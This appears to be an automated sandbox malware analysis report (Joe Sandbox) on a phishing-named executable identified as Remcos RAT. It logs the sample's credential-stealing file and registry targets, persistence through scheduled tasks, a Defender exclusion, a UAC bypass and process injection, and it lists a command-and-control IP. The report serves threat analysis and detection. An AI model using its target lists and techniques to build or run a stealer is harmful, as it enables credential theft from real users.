Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Users\user\AppData\Roaming\eaJOpx.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_10002264
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041A7B2 GetUserNameW,12_2_0041A7B2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044801F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040B21B
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040B335
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: \key3.db 12_2_0040B335
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: ESMTPPassword 17_2_004033F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 5600, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYE
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: cmd.exe 12_2_00405042
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                12
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Bypass User Account Control
                1
                Deobfuscate/Decode Files or Information
                111
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Encrypted Channel
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Access Token Manipulation
                4
                Obfuscated Files or Information
                2
                Credentials in Registry
                1
                System Service Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Remote Access Software
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                12
                Software Packing
                3
                Credentials In Files
                3
                File and Directory Discovery
                Distributed Component Object Model111
                Input Capture
                2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script222
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets38
                System Information Discovery
                SSH3
                Clipboard Data
                12
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job
                1
                Bypass User Account Control
                Cached Domain Credentials131
                Security Software Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync31
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem4
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                Process Injection
                Network Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Behavior Graph ID: 1576839
                Sample: SwiftCopy_PaymtRecpt121228.exe
                Start date: 17/12/2024
                Architecture: WINDOWS
                Score: 100

                Start node (2):
                • DNS/IP: geoplugin.net (2->51)
                • Signatures: Suricata IDS alerts for network traffic (2->57); Found malware configuration (2->59); Malicious sample detected (through community Yara rule) (2->61); 12 other signatures (2->63)
                • Started: SwiftCopy_PaymtRecpt121228.exe 7 (node 8); eaJOpx.exe 5 (node 12)

                Node 8, SwiftCopy_PaymtRecpt121228.exe:
                • Dropped: C:\Users\user\AppData\Roaming\eaJOpx.exe, PE32 (8->43); C:\Users\user\...\eaJOpx.exe:Zone.Identifier, ASCII (8->45); C:\Users\user\AppData\Local\...\tmpDCEE.tmp, XML (8->47); C:\...\SwiftCopy_PaymtRecpt121228.exe.log, ASCII (8->49)
                • Signatures: Tries to steal Mail credentials (via file registry) (8->65); Uses schtasks.exe or at.exe to add and modify task schedules (8->67); Adds a directory exclusion to Windows Defender (8->69); Injects a PE file into a foreign processes (8->71)
                • Started: SwiftCopy_PaymtRecpt121228.exe 3 13 (node 14); powershell.exe 20 (node 18); schtasks.exe 1 (node 20)

                Node 12, eaJOpx.exe:
                • Signatures: Multi AV Scanner detection for dropped file (12->73); Contains functionality to bypass UAC (CMSTPLUA) (12->75); Contains functionalty to change the wallpaper (12->77); 5 other signatures (12->79)
                • Started: eaJOpx.exe (node 22); schtasks.exe 1 (node 24)

                Node 14, SwiftCopy_PaymtRecpt121228.exe:
                • DNS/IP: 192.210.150.17, ports 49706, 49983, 49984, AS-COLOCROSSINGUS, United States (14->53); geoplugin.net 178.237.33.50, ports 49708, 80, ATOM86-ASATOM86NL, Netherlands (14->55)
                • Signatures: Detected Remcos RAT (14->87); Maps a DLL or memory area into another process (14->89)
                • Started: SwiftCopy_PaymtRecpt121228.exe (node 26); SwiftCopy_PaymtRecpt121228.exe (node 29); SwiftCopy_PaymtRecpt121228.exe 14 (node 31); SwiftCopy_PaymtRecpt121228.exe (node 33)

                Node 18, powershell.exe:
                • Signatures: Loading BitLocker PowerShell Module (18->91)
                • Started: WmiPrvSE.exe (node 35); conhost.exe (node 37)

                Node 20, schtasks.exe:
                • Started: conhost.exe (node 39)

                Node 24, schtasks.exe:
                • Started: conhost.exe (node 41)

                Node 26, SwiftCopy_PaymtRecpt121228.exe:
                • Signatures: Tries to steal Instant Messenger accounts or passwords (26->81); Tries to steal Mail credentials (via file / registry access) (26->83)

                Node 29, SwiftCopy_PaymtRecpt121228.exe:
                • Signatures: Tries to harvest and steal browser information (history, passwords, etc) (29->85)

                Source | Detection | Scanner | Label | Link
                SwiftCopy_PaymtRecpt121228.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
                SwiftCopy_PaymtRecpt121228.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\eaJOpx.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\eaJOpx.exe | 34% | ReversingLabs | Win32.Exploit.Generic |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                geoplugin.net | 178.237.33.50 | true | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://www.google.com | SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                http://geoplugin.net/json.gpl$ | SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.imvu.comr | SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                http://geoplugin.net/json.gp/C | SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
                http://www.imvu.com | SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                https://www.google.com/accounts/servicelogin | SwiftCopy_PaymtRecpt121228.exe | false | | high
                https://login.yahoo.com/config/login | SwiftCopy_PaymtRecpt121228.exe | false | | high
                http://www.nirsoft.net | SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4054409156.0000000000B33000.00000004.00000010.00020000.00000000.sdmp | false | | high
                http://www.nirsoft.net/ | SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2066490817.0000000002631000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2116715944.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                http://geoplugin.net/json.gp~ | SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.ebuddy.com | SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                192.210.150.17 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
                178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1576839
                                              Start date and time:2024-12-17 16:36:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 35s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:SwiftCopy_PaymtRecpt121228.exe
                                              Detection:MAL
                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@24/14@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 245
                                              • Number of non-executed functions: 285
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: SwiftCopy_PaymtRecpt121228.exe
Timeline (Time | Type | Description):
10:36:59 | API Interceptor | 4457185x Sleep call for process: SwiftCopy_PaymtRecpt121228.exe modified
10:37:02 | API Interceptor | 18x Sleep call for process: powershell.exe modified
10:37:05 | API Interceptor | 15x Sleep call for process: eaJOpx.exe modified
16:37:04 | Task Scheduler | Run new task: eaJOpx path: C:\Users\user\AppData\Roaming\eaJOpx.exe
Context for IP 192.210.150.17 (Associated Sample Name | Detection | Threat Name):
SwiftCopy_PaymtRecpt121224.exe | malicious | Remcos
NDA_MD580 project.exe | malicious | Remcos, GuLoader

Context for IP 178.237.33.50 (Associated Sample Name | Detection | Threat Name | Context):
BBVA S.A..vbs | malicious | Remcos | geoplugin.net/json.gp
Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
PO_0099822111ORDER.js | malicious | Remcos | geoplugin.net/json.gp
requests-pdf.exe | malicious | Remcos | geoplugin.net/json.gp
Documents.pdf | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
Context for domain geoplugin.net (Associated Sample Name | Detection | Threat Name | Resolved IP):
